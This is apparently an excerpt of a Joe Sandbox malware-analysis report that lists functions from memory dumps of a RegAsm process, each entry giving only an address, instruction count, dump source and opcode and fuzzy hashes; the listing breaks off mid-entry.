                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 37ff886d5f78738e4057d6c162b4d0fe0319fca5faab6fb9848cfa787e72ee3f
                                                                                          • Instruction ID: d9062e37df3be0474233a2ed78882580fc72d11d8a15fd5d7db3f7b25d4a2048
                                                                                          • Opcode Fuzzy Hash: 37ff886d5f78738e4057d6c162b4d0fe0319fca5faab6fb9848cfa787e72ee3f
                                                                                          • Instruction Fuzzy Hash: 8451AA35A11315DFDF21DAA8C840BEDB7BABF0E714F194168EA11EB241D7B4E980CB60
                                                                                          Function 0322F71F Relevance: .1, Instructions: 143COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3bf66d1a04ca4d77cf922c1070890c9462d6751d02f004923df6417c99d46159
                                                                                          • Instruction ID: 8b4ebedec853611076e8246f22b4f3ee1b9837696177cbba7e0f119e51220a20
                                                                                          • Opcode Fuzzy Hash: 3bf66d1a04ca4d77cf922c1070890c9462d6751d02f004923df6417c99d46159
                                                                                          • Instruction Fuzzy Hash: 0B416A76D2462ABBCB11EBA88D44ABFB7BDAF04654F450165FD00EB240D774DE808BE4
                                                                                          Function 032201F8 Relevance: .1, Instructions: 138COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 72b55dbfb701bf0da4e3f0e32a15e660753ecae1c00c1b2cb4d17a39f27915a3
                                                                                          • Instruction ID: f43d29da33dc387b9ef35210d47fa41f48fe34349fb18f760a6249e308756d95
                                                                                          • Opcode Fuzzy Hash: 72b55dbfb701bf0da4e3f0e32a15e660753ecae1c00c1b2cb4d17a39f27915a3
                                                                                          • Instruction Fuzzy Hash: 0741BE75920225EBCB14DF98C840AEEFBB4FF48710F18825AE815EB240D774AC81CBA4
                                                                                          Function 03232750 Relevance: .1, Instructions: 137COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                          • Instruction ID: 731a83e50a5fe85554bc3b9790645e3f58ce028f93be7a8426087961d11a587f
                                                                                          • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                          • Instruction Fuzzy Hash: BC514CB5A10616DFCB14CF58C580AAEF7B6FF85710F2881A9D915A7354D730AEC1CB90
                                                                                          Function 031F6154 Relevance: .1, Instructions: 133COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ac5b32331f8a84a30409aea863e23b20595e1644cd514e7a32d1faf2a11da343
                                                                                          • Instruction ID: 37f7869837bd420bcb22e1cfacb1ce6488bbe4bdf3282a8927113facdf07ca78
                                                                                          • Opcode Fuzzy Hash: ac5b32331f8a84a30409aea863e23b20595e1644cd514e7a32d1faf2a11da343
                                                                                          • Instruction Fuzzy Hash: D5513870914216DFDB29DB64CC05BE8B7B5EF09314F1882E5E529AB2C1D77899C1CF80
                                                                                          Function 031EB136 Relevance: .1, Instructions: 131COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1331cf6a46a3a17e1a34af1f939e6fb97a37e40f7f5de13184358299c726faa0
                                                                                          • Instruction ID: bc79d0a813233072e616120b12717895bc7fef61d558b5349b80f4d58de5eb31
                                                                                          • Opcode Fuzzy Hash: 1331cf6a46a3a17e1a34af1f939e6fb97a37e40f7f5de13184358299c726faa0
                                                                                          • Instruction Fuzzy Hash: 3B41E1B4615712EFC725EF69C840B2ABBE8EF08750F058469E511DF290D7B5E880CF90
                                                                                          Function 032BF0E0 Relevance: .1, Instructions: 129COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7caaade248079bb14a49ab3dfa08098a4170e3f140615ec9c57804972dc13e16
                                                                                          • Instruction ID: 0db1b370b145aabf128de3f30150470c96bdf87c2c571d151ec5d6eef5684a07
                                                                                          • Opcode Fuzzy Hash: 7caaade248079bb14a49ab3dfa08098a4170e3f140615ec9c57804972dc13e16
                                                                                          • Instruction Fuzzy Hash: 0541C4752283419BD704CF25D8659BABBE1FF88715F188A5EF8D68B382C730D849CB52
                                                                                          Function 032B866E Relevance: .1, Instructions: 129COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                          • Instruction ID: 82f094ced2628c60a6ad9dc7af8d552f60c9052e841ece325dc115510edb0551
                                                                                          • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                          • Instruction Fuzzy Hash: 3941B579B2029AABDB14DF99CC84AEFB7BEAF84784F184069E418D7341D670DD808760
                                                                                          Function 0329D5B0 Relevance: .1, Instructions: 128COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 22845eac1644becfc01bad3a17ff9b9a71edf65bf5a13ac2a3a47028ecf1ce98
                                                                                          • Instruction ID: f620afd80af389d9ee0f97eb07b8e7941bcfacd8f8f1143d00c56a4ce8883956
                                                                                          • Opcode Fuzzy Hash: 22845eac1644becfc01bad3a17ff9b9a71edf65bf5a13ac2a3a47028ecf1ce98
                                                                                          • Instruction Fuzzy Hash: 76412330A282969FDF14DF28D4916BAFBF1FF49300F09848AD1C58F245C734A496EB60
                                                                                          Function 0321D6E0 Relevance: .1, Instructions: 126COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b49c3a4c2c29e39948b50f5472735ef790d2c2cbbe9547b70f2a85e0c1146b4
                                                                                          • Instruction ID: aa03c92f10e72398d0e49c5a26c876efe4cd69e6b1cf4398118b2b2431d789c7
                                                                                          • Opcode Fuzzy Hash: 6b49c3a4c2c29e39948b50f5472735ef790d2c2cbbe9547b70f2a85e0c1146b4
                                                                                          • Instruction Fuzzy Hash: 7241D5B9524311EFC320FF15DA44A6A77A8EB55720F10452DFD158F290DB70E991CB92
                                                                                          Function 031EA020 Relevance: .1, Instructions: 122COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                          • Instruction ID: c6af2602119e357d323d6d6b10a978f53a1f163bb07dfa090330d6c1ef566bde
                                                                                          • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                          • Instruction Fuzzy Hash: DC413931A14712DBDB28DEA484407BAF761EF98716F1F806AF8898B240D732DDC0CB90
                                                                                          Function 03220710 Relevance: .1, Instructions: 121COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                          • Instruction ID: 34021e71fb27eea9b6f4a4f29f9a51ce582cc5862a6b16cebc441969a64f636d
                                                                                          • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                          • Instruction Fuzzy Hash: 36414075A10715EFDB24CF98D980AAABBF9FF08700B10896DE556DB650D370EA84CF50
                                                                                          Function 031F262C Relevance: .1, Instructions: 119COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4c4b5c0f7fb8d362ced7d06c3303155073c05aca8094ef5eacda62e02f16e633
                                                                                          • Instruction ID: 2a47d1d47c2ecdc68fc91bfe48b9678c5bb63e745c35d88e2c3f8e688d02e165
                                                                                          • Opcode Fuzzy Hash: 4c4b5c0f7fb8d362ced7d06c3303155073c05aca8094ef5eacda62e02f16e633
                                                                                          • Instruction Fuzzy Hash: C2410278911704DFCB25EF24D901B69B7F5FF98320F148AA9CA169F2A0DB709982CF41
                                                                                          Function 032BFFB1 Relevance: .1, Instructions: 117COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fc111cfab685a8435867054f0ec786d125f5eef62407ea22a86db0fba18e55cf
                                                                                          • Instruction ID: a871770b3e74ccfa4f2ebd3df7d4636f1f6051552fccdb9a2b3919646079dbb6
                                                                                          • Opcode Fuzzy Hash: fc111cfab685a8435867054f0ec786d125f5eef62407ea22a86db0fba18e55cf
                                                                                          • Instruction Fuzzy Hash: EF413B319282959BC740CB36C4A16FABFF5BF85206F1DC2A9DC81DB242D639C586C770
                                                                                          Function 032BFA49 Relevance: .1, Instructions: 113COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 400ac9c617e2ea2236ff81645f9c63531d907904b9c45e907485e002b3af6333
                                                                                          • Instruction ID: 59cd0801a29f1e4c1f4b311df860a75d9e7ea50a77c5edea32f3f80ff6feca25
                                                                                          • Opcode Fuzzy Hash: 400ac9c617e2ea2236ff81645f9c63531d907904b9c45e907485e002b3af6333
                                                                                          • Instruction Fuzzy Hash: 4E312A36730106BBC71CCE29CD44AE6BBB9EF88790F188574E918CB285D7B4D985C394
                                                                                          Function 032BEEDB Relevance: .1, Instructions: 113COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ac9ea4d25d223f5a458e190d162c100594d5482b7d300b31ac397bef0b8249b9
                                                                                          • Instruction ID: 3678cb7aba13eb375ff5e544e535d7bcb02a8f9e7eb3fc3e2a7d616593f05b8e
                                                                                          • Opcode Fuzzy Hash: ac9ea4d25d223f5a458e190d162c100594d5482b7d300b31ac397bef0b8249b9
                                                                                          • Instruction Fuzzy Hash: 7441B133E1002ACBCB18DF68D4954B9F3F5FB48344B6642BDD805AB294DB74A945CB94
                                                                                          Function 032BFB76 Relevance: .1, Instructions: 109COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d0c2528117c0ab342899c68372099f1059ce646b1cda1556e3589e80ab0a9392
                                                                                          • Instruction ID: fe584eb87749474c644d4b95b8ec3690be4801fe129aeda3d9471711ce973074
                                                                                          • Opcode Fuzzy Hash: d0c2528117c0ab342899c68372099f1059ce646b1cda1556e3589e80ab0a9392
                                                                                          • Instruction Fuzzy Hash: 5E31E336620205BBD714DF29DD45AEBBBF5EF8C390B548428F908CF240DA70E981C790
                                                                                          Function 0040E693 Relevance: .1, Instructions: 108COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                          • Instruction ID: e26acc93b273f2378c405c92169f4b300483671da86e2c38b722079323ac2129
                                                                                          • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                          • Instruction Fuzzy Hash: C43193116586F10DD30E436E08BD675AEC18E5720174EC2FEDADA6F2F3C4888418D3A5
                                                                                          Function 032002E1 Relevance: .1, Instructions: 106COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                          • Instruction ID: 23a4c2d52fa72fb5f137cc8cdd385277f38b394b2af1a64d66ce7539b02f9f50
                                                                                          • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                          • Instruction Fuzzy Hash: 07312C31614744AFDB22DB78CC44B9ABBE9BF04350F0881A5E855DB392C3B499C4CBA0
                                                                                          Function 03219274 Relevance: .1, Instructions: 105COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 97483cc0648ff311402315ad5a279a95373f24983730210efa6a13861f606cb6
                                                                                          • Instruction ID: c5d3f9dddee41ac598c776c6574968e4285582ce5a31d68eb37c67b6a439c152
                                                                                          • Opcode Fuzzy Hash: 97483cc0648ff311402315ad5a279a95373f24983730210efa6a13861f606cb6
                                                                                          • Instruction Fuzzy Hash: EF31D775A20329AFDB25DB24CD40B9AB7F5EF86310F1501D9A54CAB280CB719EC4CF91
                                                                                          Function 031F5702 Relevance: .1, Instructions: 104COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 916f19136067a6da93d431fd1d1609304f8c8114c5c4c9ec11cf48a3f2ae2058
                                                                                          • Instruction ID: e0393e30bd23c9f082a16459f1e618df528f9a646933647ee114b4cd2faca201
                                                                                          • Opcode Fuzzy Hash: 916f19136067a6da93d431fd1d1609304f8c8114c5c4c9ec11cf48a3f2ae2058
                                                                                          • Instruction Fuzzy Hash: 7631D235211B02EFCB55DB20CE84E99FBAAFF49754F444165EA014BA50D7B0F960CBD0
                                                                                          Function 031F4260 Relevance: .1, Instructions: 102COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f2a3d36478664eb09a11d5bc1b8970668d59d52c4163c3aa12b0995e134edd73
                                                                                          • Instruction ID: db968b3757ceb54a25a0d55dce43dff4690f144fd5bba82336789e794a6a2cf7
                                                                                          • Opcode Fuzzy Hash: f2a3d36478664eb09a11d5bc1b8970668d59d52c4163c3aa12b0995e134edd73
                                                                                          • Instruction Fuzzy Hash: B741AB75210B45DFC722CF29C881B9BB7E9AF49314F058429EA9ACB251CB74E984CB90
                                                                                          Function 032150E4 Relevance: .1, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                          • Instruction ID: e7fa547924f5a248e0c8931249bf102828cdaf0ca109a0a54f01d2bc4afd6736
                                                                                          • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                          • Instruction Fuzzy Hash: D131F6316283429BD762DA18C900767B6E5ABE6B50F2C81A9F8858B281D2F4C9D1C7D2
                                                                                          Function 032B61C3 Relevance: .1, Instructions: 97COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d30365a9ffe413b68308c96aa56e465a7d6fc58b7fb7e12ed252378ba1f833ea
                                                                                          • Instruction ID: b3502b66f16ec9f0e76a00d9b5d8ae8aa2616c37c550eb2ecf6930411129fcdb
                                                                                          • Opcode Fuzzy Hash: d30365a9ffe413b68308c96aa56e465a7d6fc58b7fb7e12ed252378ba1f833ea
                                                                                          • Instruction Fuzzy Hash: 5731C475A1021AABEB15DF98CC41FAEF7B9EB44780F454168E540EB284D7B4ED80CB94
                                                                                          Function 031E9730 Relevance: .1, Instructions: 96COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d5a53b8160e04ecb8dfe85ff9b387042358ff7fd911ef19ec4cfa3458e90622c
                                                                                          • Instruction ID: 51e7f3bb7c3fc64bb4753aed12691eb576229f910a3591d7339bbecfb6635db6
                                                                                          • Opcode Fuzzy Hash: d5a53b8160e04ecb8dfe85ff9b387042358ff7fd911ef19ec4cfa3458e90622c
                                                                                          • Instruction Fuzzy Hash: A321F27AA10B14AFC322DF58C800B1ABBB5FF88B60F164429A6559F341D775EC85CB90
                                                                                          Function 032B6BD7 Relevance: .1, Instructions: 96COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cb2c2238e9cc2ed9445b4f0f97a63f34c0ba64f8c6e414675cb40a186b82446f
                                                                                          • Instruction ID: 7409273caa915cbda8907d0bff8de2c2028f6f31538009be28fe08eeaf863d0c
                                                                                          • Opcode Fuzzy Hash: cb2c2238e9cc2ed9445b4f0f97a63f34c0ba64f8c6e414675cb40a186b82446f
                                                                                          • Instruction Fuzzy Hash: 42318C31610204AFCB14DF2AE889A9B7BF4FF4D340B958469E908DF249D370E945CBA4
                                                                                          Function 032B60B8 Relevance: .1, Instructions: 95COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7219e85bb9c5f786e78f48a50a1163f39ff328763ac27d8692cb18be224c4f0d
                                                                                          • Instruction ID: d448f3909a42bbda79839906e736d425e6b2be8618878b95a18282be5ba8b663
                                                                                          • Opcode Fuzzy Hash: 7219e85bb9c5f786e78f48a50a1163f39ff328763ac27d8692cb18be224c4f0d
                                                                                          • Instruction Fuzzy Hash: FA31F676630706EFDB12EF99C840BAEB7B9AF44794F144069E555DF382DAB0DC808B90
                                                                                          Function 031F07AF Relevance: .1, Instructions: 95COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 55d3a5025fc6a0551153c6784bb535ff6910f39a7317a35b0a1d7b14fc8c5650
                                                                                          • Instruction ID: 2a090def1bec9b12ced3464823e875b22c31d8ff4a99a91aea2ab49825a4e5a1
                                                                                          • Opcode Fuzzy Hash: 55d3a5025fc6a0551153c6784bb535ff6910f39a7317a35b0a1d7b14fc8c5650
                                                                                          • Instruction Fuzzy Hash: 8331D136E04712DFC715DE24C880A6BBBA5AFDC260F064529FE559B312DB31DC5187E1
                                                                                          Function 031ED6AA Relevance: .1, Instructions: 93COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                                          • Instruction ID: bbd27378d48cb5b13da7d0d93c57605d156e165949f81519ef0de682b9688153
                                                                                          • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                                          • Instruction Fuzzy Hash: E231D27AE10A04AFDB25DF58E880F6AF3A9DB88758F1E8468ED059B240D371DD80DB50
                                                                                          Function 0042F2C3 Relevance: .1, Instructions: 93COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 18604d1281625d51e79283eddb6cb8b9e98ac479cd07e3797c0de45708ad42e5
                                                                                          • Instruction ID: 3c77908d87d474fa98f9c50c5034a1f8e5f01fc4836a14831c9dfe08a3a25dfc
                                                                                          • Opcode Fuzzy Hash: 18604d1281625d51e79283eddb6cb8b9e98ac479cd07e3797c0de45708ad42e5
                                                                                          • Instruction Fuzzy Hash: 8731D172B106265BD344CE3AD88065AF7E1FB88310794873AD919C3B40E774F965CBD0
                                                                                          Function 031F57C0 Relevance: .1, Instructions: 92COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 73b2660e0ff5830b7c65fc3ff41b3c70409d0f780ebdd19e66dd78a92e5da859
